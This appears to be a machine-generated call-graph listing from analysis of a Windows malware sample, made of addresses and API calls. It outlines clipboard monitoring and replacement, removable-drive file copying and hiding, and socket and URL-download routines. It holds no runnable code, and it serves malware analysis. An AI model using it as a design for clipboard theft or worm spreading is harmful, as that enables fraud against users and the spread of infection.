strcmp 5215->5213 5216 40b391 5215->5216 5265 40aed0 inet_ntoa 5216->5265 5218 40b39f strstr 5219 40b3f0 5218->5219 5220 40b3af 5218->5220 5268 40aed0 inet_ntoa 5219->5268 5266 40aed0 inet_ntoa 5220->5266 5223 40b3bd strstr 5223->5213 5225 40b3cd 5223->5225 5224 40b3fe strstr 5226 40b40e 5224->5226 5227 40b44f 5224->5227 5267 40aed0 inet_ntoa 5225->5267 5269 40aed0 inet_ntoa 5226->5269 5271 40aed0 inet_ntoa 5227->5271 5231 40b45d strstr 5234 40b46d 5231->5234 5235 40b4ae EnterCriticalSection 5231->5235 5232 40b3db strstr 5232->5213 5232->5219 5233 40b41c strstr 5233->5213 5236 40b42c 5233->5236 5272 40aed0 inet_ntoa 5234->5272 5238 40b4c6 5235->5238 5270 40aed0 inet_ntoa 5236->5270 5246 40b4f1 5238->5246 5274 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5238->5274 5240 40b43a strstr 5240->5213 5240->5227 5241 40b47b strstr 5241->5213 5242 40b48b 5241->5242 5273 40aed0 inet_ntoa 5242->5273 5245 40b5ea LeaveCriticalSection 5245->5213 5246->5245 5248 40a240 7 API calls 5246->5248 5247 40b499 strstr 5247->5213 5247->5235 5249 40b535 5248->5249 5249->5245 5275 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5249->5275 5251 40b553 5252 40b580 5251->5252 5253 40b576 Sleep 5251->5253 5255 40b5a5 5251->5255 5254 40a660 _invalid_parameter 3 API calls 5252->5254 5253->5251 5254->5255 5255->5245 5276 40b030 5255->5276 5257->4528 5259 40b030 14 API calls 5258->5259 5260 40b023 LeaveCriticalSection 5259->5260 5260->4520 5262 40b2a7 gethostbyname 5261->5262 5263 40b2c3 5261->5263 5262->5263 5263->5213 5264 40aed0 inet_ntoa 5263->5264 5264->5215 5265->5218 5266->5223 5267->5232 5268->5224 5269->5233 5270->5240 5271->5231 5272->5241 5273->5247 5274->5246 5275->5251 5277 40b044 5276->5277 5284 40b03f 5276->5284 5278 40a450 __aligned_recalloc_base 7 API calls 5277->5278 5280 40b058 5278->5280 5279 40b0b4 CreateFileW 5281 40b103 InterlockedExchange 5279->5281 5282 40b0d7 WriteFile FlushFileBuffers CloseHandle 5279->5282 5280->5279 5280->5284 5283 40a660 _invalid_parameter 3 API calls 5281->5283 5282->5281 5283->5284 5284->5245 5286 40d70d 5285->5286 5287 40d643 5286->5287 5288 40d731 WaitForSingleObject 5286->5288 5287->4535 5287->4536 5288->5286 5289 40d74c CloseHandle 5288->5289 5289->5286 5291 405829 memset GetModuleHandleW 5290->5291 5292 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5291->5292 5292->5292 5293 4058a0 CreateWindowExW 5292->5293 5294 4058cb 5293->5294 5295 4058cd GetMessageA 5293->5295 5296 4058ff ExitThread 5294->5296 5297 4058e1 TranslateMessage DispatchMessageA 5295->5297 5298 4058f7 5295->5298 5297->5295 5298->5291 5298->5296 5320 40ec20 CreateFileW 5299->5320 5301 406cd8 ExitThread 5303 406b80 5303->5301 5304 406cc8 Sleep 5303->5304 5305 406bb9 5303->5305 5323 406340 GetLogicalDrives 5303->5323 5304->5303 5329 406260 5305->5329 5308 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5309 406c66 wsprintfW 5308->5309 5310 406c7b wsprintfW 5308->5310 5309->5310 5335 406650 _chkstk 5310->5335 5311 406beb 5316 407407 5313->5316 5314 4074e1 Sleep 5314->5316 5315 40742f Sleep 5315->5316 5316->5314 5316->5315 5317 40745e Sleep wsprintfA DeleteUrlCacheEntry 5316->5317 5319 40ef90 64 API calls 5316->5319 5388 40eee0 InternetOpenA 5317->5388 5319->5316 5321 40ec68 5320->5321 5322 40ec4f GetFileSize CloseHandle 5320->5322 5321->5303 5322->5321 5328 40636d 5323->5328 5324 4063e6 5324->5303 5325 40637c RegOpenKeyExW 5326 40639e RegQueryValueExW 5325->5326 5325->5328 5327 4063da RegCloseKey 5326->5327 5326->5328 5327->5328 5328->5324 5328->5325 5328->5327 5330 4062b9 5329->5330 5331 40627c 5329->5331 5330->5308 5330->5311 5370 4062c0 GetDriveTypeW 5331->5370 5334 4062ab lstrcpyW 5334->5330 5336 406667 5335->5336 5337 40666e 6 API calls 5335->5337 5336->5311 5338 406722 5337->5338 5339 406764 PathFileExistsW 5337->5339 5342 40ec20 3 API calls 5338->5342 5340 406803 PathFileExistsW 5339->5340 5341 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5339->5341 5345 406814 5340->5345 5346 406859 FindFirstFileW 5340->5346 5343 4067a9 CreateDirectoryW 5341->5343 5344 4067cb PathFileExistsW 5341->5344 5347 40672e 5342->5347 5343->5344 5349 4067bc SetFileAttributesW 5343->5349 5344->5340 5350 4067dc CopyFileW 5344->5350 5351 406834 5345->5351 5352 40681c 5345->5352 5346->5336 5363 406880 5346->5363 5347->5339 5348 406745 SetFileAttributesW DeleteFileW 5347->5348 5348->5339 5349->5344 5350->5340 5354 4067f4 SetFileAttributesW 5350->5354 5356 406400 3 API calls 5351->5356 5375 406400 CoInitialize CoCreateInstance 5352->5375 5353 406942 lstrcmpW 5357 406958 lstrcmpW 5353->5357 5353->5363 5354->5340 5358 40682f SetFileAttributesW 5356->5358 5357->5363 5358->5346 5360 406b19 FindNextFileW 5360->5353 5361 406b35 FindClose 5360->5361 5361->5336 5362 40699e lstrcmpiW 5362->5363 5363->5353 5363->5360 5363->5362 5364 406a05 PathMatchSpecW 5363->5364 5366 406a83 PathFileExistsW 5363->5366 5379 406510 CreateDirectoryW wsprintfW FindFirstFileW 5363->5379 5364->5363 5365 406a26 wsprintfW SetFileAttributesW DeleteFileW 5364->5365 5365->5363 5366->5363 5367 406a99 wsprintfW wsprintfW 5366->5367 5367->5363 5368 406b03 MoveFileExW 5367->5368 5368->5360 5371 40629f 5370->5371 5372 4062e8 5370->5372 5371->5330 5371->5334 5372->5371 5373 4062fc QueryDosDeviceW 5372->5373 5373->5371 5374 406316 StrCmpNW 5373->5374 5374->5371 5376 406436 5375->5376 5378 406472 5375->5378 5377 406440 wsprintfW 5376->5377 5376->5378 5377->5378 5378->5358 5380 406565 lstrcmpW 5379->5380 5381 40663f 5379->5381 5382 406591 5380->5382 5383 40657b lstrcmpW 5380->5383 5381->5363 5385 40660c FindNextFileW 5382->5385 5383->5382 5384 406593 wsprintfW wsprintfW 5383->5384 5384->5382 5386 4065f6 MoveFileExW 5384->5386 5385->5380 5387 406628 FindClose RemoveDirectoryW 5385->5387 5386->5385 5387->5381 5389 40ef06 InternetOpenUrlA 5388->5389 5390 40ef78 Sleep 5388->5390 5391 40ef25 HttpQueryInfoA 5389->5391 5392 40ef6e InternetCloseHandle 5389->5392 5390->5316 5393 40ef64 InternetCloseHandle 5391->5393 5394 40ef4e 5391->5394 5392->5390 5393->5392 5394->5393 5395 40cf40 5400 40b1f0 5395->5400 5399 40cf6a 5401 40b280 2 API calls 5400->5401 5402 40b1ff 5401->5402 5403 40b209 5402->5403 5404 40b20d EnterCriticalSection 5402->5404 5403->5399 5407 40cf80 InterlockedExchangeAdd 5403->5407 5405 40b22c LeaveCriticalSection 5404->5405 5405->5403 5408 40cf96 5407->5408 5409 40cf9d 5407->5409 5408->5399 5424 40d270 5409->5424 5412 40cfbd InterlockedIncrement 5421 40cfc7 5412->5421 5414 40cff0 5434 40aed0 inet_ntoa 5414->5434 5416 40cffc 5418 40d0c0 InterlockedDecrement 5416->5418 5417 40d1a0 6 API calls 5417->5421 5449 40aff0 shutdown closesocket 5418->5449 5420 40a450 __aligned_recalloc_base 7 API calls 5420->5421 5421->5414 5421->5417 5421->5418 5421->5420 5422 40a660 _invalid_parameter 3 API calls 5421->5422 5431 40b9d0 5421->5431 5435 40ba20 5421->5435 5422->5421 5425 40d27d socket 5424->5425 5426 40d292 htons connect 5425->5426 5427 40d2ef 5425->5427 5426->5427 5428 40d2da 5426->5428 5427->5425 5429 40cfad 5427->5429 5450 40aff0 shutdown closesocket 5428->5450 5429->5408 5429->5412 5451 40b930 5431->5451 5434->5416 5445 40ba31 5435->5445 5437 40ba4f 5439 40a660 _invalid_parameter 3 API calls 5437->5439 5440 40bdff 5439->5440 5440->5421 5441 40be10 21 API calls 5441->5445 5444 40b9d0 13 API calls 5444->5445 5445->5437 5445->5441 5445->5444 5446 40b330 32 API calls 5445->5446 5459 40bf60 5445->5459 5466 40b700 EnterCriticalSection 5445->5466 5471 406e20 5445->5471 5476 406ec0 5445->5476 5481 406cf0 5445->5481 5488 406df0 5445->5488 5446->5445 5449->5408 5450->5429 5452 40c3b0 3 API calls 5451->5452 5453 40b93b 5452->5453 5454 40b957 lstrlenA 5453->5454 5455 40c640 7 API calls 5454->5455 5456 40b98d 5455->5456 5457 40b9b8 5456->5457 5458 40a660 _invalid_parameter 3 API calls 5456->5458 5457->5421 5458->5457 5460 40bf71 lstrlenA 5459->5460 5461 40c640 7 API calls 5460->5461 5464 40bf8f 5461->5464 5462 40bf9b 5463 40c01f 5462->5463 5465 40a660 _invalid_parameter 3 API calls 5462->5465 5463->5445 5464->5460 5464->5462 5465->5463 5467 40b718 5466->5467 5468 40b754 LeaveCriticalSection 5467->5468 5491 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5467->5491 5468->5445 5470 40b743 5470->5468 5492 406e60 5471->5492 5474 40d610 17 API calls 5475 406e59 5474->5475 5475->5445 5477 406e60 75 API calls 5476->5477 5478 406edf 5477->5478 5479 406f0c 5478->5479 5507 406f20 5478->5507 5479->5445 5510 405f40 EnterCriticalSection 5481->5510 5483 406d0a 5484 406d3d 5483->5484 5515 406d50 5483->5515 5484->5445 5487 40a660 _invalid_parameter 3 API calls 5487->5484 5522 406000 EnterCriticalSection 5488->5522 5490 406e12 5490->5445 5491->5470 5495 406e73 5492->5495 5493 406e34 5493->5474 5493->5475 5495->5493 5496 405e50 EnterCriticalSection 5495->5496 5497 40ccd0 71 API calls 5496->5497 5498 405e6e 5497->5498 5499 405f2b LeaveCriticalSection 5498->5499 5500 405e87 5498->5500 5503 405ea8 5498->5503 5499->5495 5501 405e91 memcpy 5500->5501 5502 405ea6 5500->5502 5501->5502 5504 40a660 _invalid_parameter 3 API calls 5502->5504 5503->5502 5506 405f06 memcpy 5503->5506 5505 405f28 5504->5505 5505->5499 5506->5502 5508 40b930 13 API calls 5507->5508 5509 406f65 5508->5509 5509->5479 5511 405f5e 5510->5511 5512 405fea LeaveCriticalSection 5511->5512 5513 40a6d0 8 API calls 5511->5513 5512->5483 5514 405fbc 5513->5514 5514->5512 5516 40a450 __aligned_recalloc_base 7 API calls 5515->5516 5517 406d62 memcpy 5516->5517 5518 40b930 13 API calls 5517->5518 5519 406dcc 5518->5519 5520 40a660 _invalid_parameter 3 API calls 5519->5520 5521 406d31 5520->5521 5521->5487 5547 40cd30 5522->5547 5525 406243 LeaveCriticalSection 5525->5490 5526 40ccd0 71 API calls 5527 406039 5526->5527 5527->5525 5528 406158 5527->5528 5530 406094 memcpy 5527->5530 5529 406181 5528->5529 5531 405c90 75 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5533 40a660 _invalid_parameter 3 API calls 5530->5533 5531->5529 5534 4061a2 5532->5534 5535 4060b8 5533->5535 5534->5525 5536 4061b1 CreateFileW 5534->5536 5537 40a6d0 8 API calls 5535->5537 5536->5525 5538 4061d4 5536->5538 5539 4060c8 5537->5539 5542 4061f1 WriteFile 5538->5542 5543 40622f FlushFileBuffers CloseHandle 5538->5543 5540 40a660 _invalid_parameter 3 API calls 5539->5540 5541 4060ef 5540->5541 5544 40c640 7 API calls 5541->5544 5542->5538 5543->5525 5545 406125 5544->5545 5546 4072a0 71 API calls 5545->5546 5546->5528 5550 40c280 5547->5550 5552 40c291 5550->5552 5551 40a6d0 8 API calls 5551->5552 5552->5551 5553 40c1e0 70 API calls 5552->5553 5556 407fa0 68 API calls 5552->5556 5557 40c2ab 5552->5557 5558 40c2eb memcmp 5552->5558 5553->5552 5554 40a660 _invalid_parameter 3 API calls 5555 406022 5554->5555 5555->5525 5555->5526 5556->5552 5557->5554 5558->5552 5558->5557 5720 40d400 5721 40d416 5720->5721 5738 40d46e 5720->5738 5722 40d420 5721->5722 5723 40d473 5721->5723 5724 40d4c3 5721->5724 5721->5738 5725 40a240 7 API calls 5722->5725 5727 40d498 5723->5727 5728 40d48b InterlockedDecrement 5723->5728 5747 40c070 5724->5747 5729 40d42d 5725->5729 5730 40a660 _invalid_parameter 3 API calls 5727->5730 5728->5727 5743 4023d0 5729->5743 5732 40d4a4 5730->5732 5733 40a660 _invalid_parameter 3 API calls 5732->5733 5733->5738 5735 40b1f0 4 API calls 5736 40d44f 5735->5736 5737 40d45b InterlockedIncrement 5736->5737 5736->5738 5737->5738 5740 40d521 IsBadReadPtr 5741 40d4e9 5740->5741 5741->5738 5741->5740 5742 40ba20 194 API calls 5741->5742 5752 40c170 5741->5752 5742->5741 5744 402413 5743->5744 5745 4023d9 5743->5745 5744->5735 5745->5744 5746 4023ea InterlockedIncrement 5745->5746 5746->5744 5748 40c083 5747->5748 5749 40c0ad memcpy 5747->5749 5750 40a490 9 API calls 5748->5750 5749->5741 5751 40c0a4 5750->5751 5751->5749 5753 40c199 5752->5753 5754 40c18e 5752->5754 5753->5754 5755 40c1b1 memmove 5753->5755 5754->5741 5755->5754 5756 40da00 5766 4013b0 5756->5766 5758 40b6b0 5 API calls 5761 40da0d 5758->5761 5759 40da27 InterlockedExchangeAdd 5760 40da6b WaitForSingleObject 5759->5760 5759->5761 5760->5761 5762 40da84 5760->5762 5761->5758 5761->5759 5761->5760 5763 40b9d0 13 API calls 5761->5763 5765 40da8d 5761->5765 5778 401330 5762->5778 5763->5761 5767 40a240 7 API calls 5766->5767 5768 4013bb CreateEventA socket 5767->5768 5769 4013f2 5768->5769 5770 4013f8 5768->5770 5771 401330 8 API calls 5769->5771 5772 401401 bind 5770->5772 5773 401462 5770->5773 5771->5770 5774 401444 CreateThread 5772->5774 5775 401434 5772->5775 5773->5761 5774->5773 5788 401100 5774->5788 5776 401330 8 API calls 5775->5776 5777 40143a 5776->5777 5777->5761 5779 401339 5778->5779 5785 40139b 5778->5785 5780 401341 SetEvent WaitForSingleObject CloseHandle 5779->5780 5779->5785 5786 401369 5780->5786 5787 40138b 5780->5787 5782 401395 5784 40a660 _invalid_parameter 3 API calls 5782->5784 5783 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5783->5786 5784->5785 5785->5765 5786->5783 5786->5787 5817 40aff0 shutdown closesocket 5787->5817 5789 401115 ioctlsocket 5788->5789 5790 4011e4 5789->5790 5795 40113a 5789->5795 5791 40a660 _invalid_parameter 3 API calls 5790->5791 5793 4011ea 5791->5793 5792 4011cd WaitForSingleObject 5792->5789 5792->5790 5794 40a490 9 API calls 5794->5795 5795->5792 5795->5794 5796 401168 recvfrom 5795->5796 5797 4011ad InterlockedExchangeAdd 5795->5797 5796->5792 5796->5795 5799 401000 5797->5799 5800 401014 5799->5800 5801 40103b 5800->5801 5802 40a240 7 API calls 5800->5802 5810 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5801->5810 5802->5801 5804 40105b 5811 401580 5804->5811 5806 4010ec 5806->5795 5807 4010a3 IsBadReadPtr 5808 401071 5807->5808 5808->5806 5808->5807 5809 4010d8 memmove 5808->5809 5809->5808 5810->5804 5812 401592 5811->5812 5813 4015a5 memcpy 5811->5813 5815 40a490 9 API calls 5812->5815 5814 4015c1 5813->5814 5814->5808 5816 40159f 5815->5816 5816->5813 5817->5782 5818 40d980 5819 40ba20 194 API calls 5818->5819 5820 40d9b8 5819->5820 5821 40d580 5826 401b60 5821->5826 5823 40d595 5824 40d5b4 5823->5824 5825 401b60 16 API calls 5823->5825 5825->5824 5827 401b70 5826->5827 5845 401c42 5826->5845 5828 40a240 7 API calls 5827->5828 5827->5845 5829 401b9d 5828->5829 5830 40a6d0 8 API calls 5829->5830 5829->5845 5831 401bc9 5830->5831 5832 401be6 5831->5832 5833 401bd6 5831->5833 5835 401ae0 4 API calls 5832->5835 5834 40a660 _invalid_parameter 3 API calls 5833->5834 5836 401bdc 5834->5836 5837 401bf3 5835->5837 5836->5823 5838 401c33 5837->5838 5839 401bfc EnterCriticalSection 5837->5839 5842 40a660 _invalid_parameter 3 API calls 5838->5842 5840 401c13 5839->5840 5841 401c1f LeaveCriticalSection 5839->5841 5840->5841 5841->5823 5843 401c3c 5842->5843 5844 40a660 _invalid_parameter 3 API calls 5843->5844 5844->5845 5845->5823 5559 4069c8 5567 40696e 5559->5567 5560 40699e lstrcmpiW 5560->5567 5561 406b19 FindNextFileW 5563 406942 lstrcmpW 5561->5563 5564 406b35 FindClose 5561->5564 5562 406a05 PathMatchSpecW 5565 406a26 wsprintfW SetFileAttributesW DeleteFileW 5562->5565 5562->5567 5566 406958 lstrcmpW 5563->5566 5563->5567 5569 406b42 5564->5569 5565->5567 5566->5567 5567->5560 5567->5561 5567->5562 5568 406a83 PathFileExistsW 5567->5568 5572 406510 11 API calls 5567->5572 5568->5567 5570 406a99 wsprintfW wsprintfW 5568->5570 5570->5567 5571 406b03 MoveFileExW 5570->5571 5571->5561 5572->5567 5573 40f34c 5574 40f354 5573->5574 5576 40f408 5574->5576 5579 40f589 5574->5579 5578 40f38d 5578->5576 5583 40f474 RtlUnwind 5578->5583 5581 40f59e 5579->5581 5582 40f5ba 5579->5582 5580 40f629 NtQueryVirtualMemory 5580->5582 5581->5580 5581->5582 5582->5578 5584 40f48c 5583->5584 5584->5578 5585 40b8d0 5586 40b8d3 WaitForSingleObject 5585->5586 5587 40b901 5586->5587 5588 40b8eb InterlockedDecrement 5586->5588 5589 40b8fa 5588->5589 5589->5586 5590 40b010 16 API calls 5589->5590 5590->5589 5591 401f50 GetQueuedCompletionStatus 5592 401f92 5591->5592 5593 402008 5591->5593 5594 401f97 WSAGetOverlappedResult 5592->5594 5598 401d60 5592->5598 5594->5592 5595 401fb9 WSAGetLastError 5594->5595 5595->5592 5597 401fd3 GetQueuedCompletionStatus 5597->5592 5597->5593 5599 401ef2 InterlockedDecrement setsockopt closesocket 5598->5599 5600 401d74 5598->5600 5602 401e39 5599->5602 5600->5599 5601 401d7c 5600->5601 5618 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5601->5618 5602->5597 5604 401d81 InterlockedExchange 5605 401d98 5604->5605 5606 401e4e 5604->5606 5605->5602 5611 401da9 InterlockedDecrement 5605->5611 5612 401dbc InterlockedDecrement InterlockedExchangeAdd 5605->5612 5607 401e67 5606->5607 5608 401e57 InterlockedDecrement 5606->5608 5609 401e72 5607->5609 5610 401e87 InterlockedDecrement 5607->5610 5608->5597 5627 401ae0 WSASend 5609->5627 5614 401ee9 5610->5614 5611->5597 5615 401e2f 5612->5615 5614->5597 5619 401cf0 5615->5619 5616 401e7e 5616->5597 5618->5604 5620 401d00 InterlockedExchangeAdd 5619->5620 5621 401cfc 5619->5621 5622 401d53 5620->5622 5623 401d17 InterlockedIncrement 5620->5623 5621->5602 5622->5602 5633 401c50 WSARecv 5623->5633 5625 401d46 5625->5622 5626 401d4c InterlockedDecrement 5625->5626 5626->5622 5628 401b50 5627->5628 5629 401b12 WSAGetLastError 5627->5629 5628->5616 5629->5628 5630 401b1f 5629->5630 5631 401b56 5630->5631 5632 401b26 Sleep WSASend 5630->5632 5631->5616 5632->5628 5632->5629 5634 401cd2 5633->5634 5635 401c8e 5633->5635 5634->5625 5636 401c90 WSAGetLastError 5635->5636 5637 401ca4 Sleep WSARecv 5635->5637 5638 401cdb 5635->5638 5636->5634 5636->5635 5637->5634 5637->5636 5638->5625 5639 40d9d0 5642 401200 5639->5642 5641 40d9f2 5643 40121d 5642->5643 5657 401314 5642->5657 5644 40a450 __aligned_recalloc_base 7 API calls 5643->5644 5643->5657 5645 401247 memcpy htons 5644->5645 5646 4012ed 5645->5646 5647 401297 sendto 5645->5647 5650 40a660 _invalid_parameter 3 API calls 5646->5650 5648 4012b6 InterlockedExchangeAdd 5647->5648 5649 4012e9 5647->5649 5648->5647 5651 4012cc 5648->5651 5649->5646 5652 40130a 5649->5652 5653 4012fc 5650->5653 5654 40a660 _invalid_parameter 3 API calls 5651->5654 5655 40a660 _invalid_parameter 3 API calls 5652->5655 5653->5641 5656 4012db 5654->5656 5655->5657 5656->5641 5657->5641 5846 405910 GetWindowLongW 5847 405934 5846->5847 5848 405956 5846->5848 5849 405941 5847->5849 5850 4059c7 IsClipboardFormatAvailable 5847->5850 5851 4059a6 5848->5851 5852 40598e SetWindowLongW 5848->5852 5863 405951 5848->5863 5855 405964 SetClipboardViewer SetWindowLongW 5849->5855 5856 405947 5849->5856 5853 4059e3 IsClipboardFormatAvailable 5850->5853 5854 4059da 5850->5854 5858 4059ac SendMessageA 5851->5858 5851->5863 5852->5863 5853->5854 5859 4059f8 IsClipboardFormatAvailable 5853->5859 5861 405a15 OpenClipboard 5854->5861 5880 405adc 5854->5880 5857 405b44 DefWindowProcA 5855->5857 5860 405afd RegisterRawInputDevices ChangeClipboardChain 5856->5860 5856->5863 5858->5863 5859->5854 5860->5857 5864 405a25 GetClipboardData 5861->5864 5861->5880 5862 405ae5 SendMessageA 5862->5863 5863->5857 5864->5863 5865 405a3d GlobalLock 5864->5865 5865->5863 5866 405a55 5865->5866 5867 405a68 5866->5867 5868 405a89 5866->5868 5869 405a9e 5867->5869 5870 405a6e 5867->5870 5871 405630 13 API calls 5868->5871 5887 405750 5869->5887 5872 405a74 GlobalUnlock CloseClipboard 5870->5872 5881 405510 5870->5881 5871->5872 5876 405ac7 5872->5876 5872->5880 5895 4048a0 lstrlenW 5876->5895 5879 40a660 _invalid_parameter 3 API calls 5879->5880 5880->5862 5880->5863 5884 40551b 5881->5884 5882 405521 lstrlenW 5882->5884 5886 405534 5882->5886 5883 40a450 __aligned_recalloc_base 7 API calls 5883->5884 5884->5882 5884->5883 5885 405551 lstrcpynW 5884->5885 5884->5886 5885->5884 5885->5886 5886->5872 5892 40575d 5887->5892 5888 405763 lstrlenA 5888->5892 5893 405776 5888->5893 5889 4055d0 2 API calls 5889->5892 5890 40a450 __aligned_recalloc_base 7 API calls 5890->5892 5892->5888 5892->5889 5892->5890 5892->5893 5894 40a660 _invalid_parameter 3 API calls 5892->5894 5932 405700 5892->5932 5893->5872 5894->5892 5904 4048d4 5895->5904 5896 404d5e StrStrW 5897 404d71 5896->5897 5898 404d75 StrStrW 5896->5898 5897->5898 5899 404d88 5898->5899 5900 404d8c StrStrW 5898->5900 5899->5900 5901 404d9f 5900->5901 5902 404ae2 5901->5902 5903 404e09 isalpha 5901->5903 5916 404e43 5901->5916 5902->5879 5903->5901 5905 404e20 isdigit 5903->5905 5904->5902 5906 404c69 StrStrW 5904->5906 5909 404af4 5904->5909 5905->5901 5905->5902 5907 404c94 StrStrW 5906->5907 5906->5909 5908 404cbf StrStrW 5907->5908 5907->5909 5908->5909 5909->5896 5909->5902 5910 405351 StrStrW 5914 405364 5910->5914 5915 40536b StrStrW 5910->5915 5911 405303 StrStrW 5912 405316 5911->5912 5913 40531d StrStrW 5911->5913 5912->5913 5917 405330 5913->5917 5918 405337 StrStrW 5913->5918 5914->5915 5919 405385 StrStrW 5915->5919 5920 40537e 5915->5920 5916->5910 5916->5911 5917->5918 5918->5910 5921 40534a 5918->5921 5922 405398 5919->5922 5923 40539f StrStrW 5919->5923 5920->5919 5921->5910 5922->5923 5924 4053b2 5923->5924 5925 4053b9 StrStrW 5923->5925 5924->5925 5926 4053cc lstrlenA 5925->5926 5926->5902 5928 405492 GlobalAlloc 5926->5928 5928->5902 5929 4054ad GlobalLock 5928->5929 5929->5902 5930 4054c0 memcpy GlobalUnlock OpenClipboard 5929->5930 5930->5902 5931 4054ed EmptyClipboard SetClipboardData CloseClipboard 5930->5931 5931->5902 5933 40570b 5932->5933 5934 405711 lstrlenA 5933->5934 5935 4055d0 2 API calls 5933->5935 5936 405744 5933->5936 5934->5933 5935->5933 5936->5892 5658 40e5d1 5660 40e5da 5658->5660 5659 40e6cd 5660->5659 5661 40e643 lstrcmpiW 5660->5661 5662 40e6c3 SysFreeString 5661->5662 5663 40e656 5661->5663 5662->5659 5664 40e3c0 2 API calls 5663->5664 5666 40e664 5664->5666 5665 40e6b5 5665->5662 5666->5662 5666->5665 5667 40e693 lstrcmpiW 5666->5667 5668 40e6a5 5667->5668 5669 40e6ab SysFreeString 5667->5669 5668->5669 5669->5665 5670 40f354 5671 40f372 5670->5671 5672 40f408 5670->5672 5673 40f589 NtQueryVirtualMemory 5671->5673 5675 40f38d 5673->5675 5674 40f474 RtlUnwind 5674->5675 5675->5672 5675->5674 5937 405f1d 5938 405eb1 5937->5938 5939 405f1b 5938->5939 5943 405f06 memcpy 5938->5943 5940 40a660 _invalid_parameter 3 API calls 5939->5940 5941 405f28 LeaveCriticalSection 5940->5941 5943->5939 5676 40d0e0 5681 40d140 5676->5681 5679 40d10e 5680 40d140 send 5680->5679 5682 40d151 send 5681->5682 5683 40d0f3 5682->5683 5684 40d16e 5682->5684 5683->5679 5683->5680 5684->5682 5684->5683 5685 40d360 5688 40d364 5685->5688 5687 40d380 WaitForSingleObject 5687->5688 5690 40d3a5 5687->5690 5688->5687 5689 40cf80 208 API calls 5688->5689 5688->5690 5691 40b6b0 EnterCriticalSection 5688->5691 5689->5688 5692 40b6e7 LeaveCriticalSection 5691->5692 5693 40b6cf 5691->5693 5692->5688 5694 40c370 3 API calls 5693->5694 5695 40b6da 5694->5695 5695->5692 5944 40daa0 5950 401470 5944->5950 5946 40dab4 5947 40dadf 5946->5947 5948 40dac5 WaitForSingleObject 5946->5948 5949 401330 8 API calls 5948->5949 5949->5947 5951 401483 5950->5951 5952 401572 5950->5952 5951->5952 5953 40a240 7 API calls 5951->5953 5952->5946 5954 401498 CreateEventA socket 5953->5954 5955 4014d5 5954->5955 5956 4014cf 5954->5956 5955->5952 5958 4014e2 htons setsockopt bind 5955->5958 5957 401330 8 API calls 5956->5957 5957->5955 5959 401546 5958->5959 5960 401558 CreateThread 5958->5960 5961 401330 8 API calls 5959->5961 5960->5952 5963 401100 20 API calls _invalid_parameter 5960->5963 5962 40154c 5961->5962 5962->5946 5964 401920 GetTickCount WaitForSingleObject 5965 401ac9 5964->5965 5966 40194d WSAWaitForMultipleEvents 5964->5966 5967 4019f0 GetTickCount 5966->5967 5968 40196a WSAEnumNetworkEvents 5966->5968 5969 401a43 GetTickCount 5967->5969 5970 401a05 EnterCriticalSection 5967->5970 5968->5967 5980 401983 5968->5980 5973 401ab5 WaitForSingleObject 5969->5973 5974 401a4e EnterCriticalSection 5969->5974 5971 401a16 5970->5971 5972 401a3a LeaveCriticalSection 5970->5972 5978 401a29 LeaveCriticalSection 5971->5978 6006 401820 5971->6006 5972->5973 5973->5965 5973->5966 5976 401aa1 LeaveCriticalSection GetTickCount 5974->5976 5977 401a5f InterlockedExchangeAdd 5974->5977 5975 401992 accept 5975->5967 5975->5980 5976->5973 6024 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5977->6024 5978->5973 5980->5967 5980->5975 5985 401cf0 7 API calls 5980->5985 5986 4022c0 5980->5986 5984 401a72 5984->5976 5984->5977 6025 40aff0 shutdown closesocket 5984->6025 5985->5967 5987 4022d2 EnterCriticalSection 5986->5987 5988 4022cd 5986->5988 5989 4022e7 5987->5989 5990 4022fd LeaveCriticalSection 5987->5990 5988->5980 5989->5990 5991 402308 5990->5991 5992 40230f 5990->5992 5991->5980 5993 40a240 7 API calls 5992->5993 5994 402319 5993->5994 5995 402326 getpeername CreateIoCompletionPort 5994->5995 5996 4023b8 5994->5996 5997 4023b2 5995->5997 5998 402366 5995->5998 6028 40aff0 shutdown closesocket 5996->6028 6002 40a660 _invalid_parameter 3 API calls 5997->6002 6026 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5998->6026 6000 4023c3 6000->5980 6002->5996 6003 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6027 4021e0 EnterCriticalSection LeaveCriticalSection 6003->6027 6005 4023ab 6005->5980 6007 40190f 6006->6007 6008 401830 6006->6008 6007->5972 6008->6007 6009 40183d InterlockedExchangeAdd 6008->6009 6009->6007 6015 401854 6009->6015 6010 401880 6011 401891 6010->6011 6038 40aff0 shutdown closesocket 6010->6038 6012 4018a7 InterlockedDecrement 6011->6012 6016 401901 6011->6016 6012->6016 6015->6007 6015->6010 6029 4017a0 EnterCriticalSection 6015->6029 6017 402247 6016->6017 6018 402265 EnterCriticalSection 6016->6018 6017->5972 6019 40229c LeaveCriticalSection DeleteCriticalSection 6018->6019 6021 40227d 6018->6021 6020 40a660 _invalid_parameter 3 API calls 6019->6020 6020->6017 6022 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6021->6022 6023 40229b 6021->6023 6022->6021 6023->6019 6024->5984 6025->5984 6026->6003 6027->6005 6028->6000 6030 401807 LeaveCriticalSection 6029->6030 6031 4017ba InterlockedExchangeAdd 6029->6031 6030->6015 6032 4017ca LeaveCriticalSection 6031->6032 6033 4017d9 6031->6033 6032->6015 6034 40a660 _invalid_parameter 3 API calls 6033->6034 6035 4017fe 6034->6035 6036 40a660 _invalid_parameter 3 API calls 6035->6036 6037 401804 6036->6037 6037->6030 6038->6011 5696 405fe5 5698 405f5e 5696->5698 5697 405fea LeaveCriticalSection 5698->5697 5699 40a6d0 8 API calls 5698->5699 5700 405fbc 5699->5700 5700->5697 6039 406ba6 6042 406b88 6039->6042 6040 406cc8 Sleep 6040->6042 6041 406bb9 6043 406260 4 API calls 6041->6043 6042->6040 6042->6041 6044 406cd8 ExitThread 6042->6044 6047 406340 4 API calls 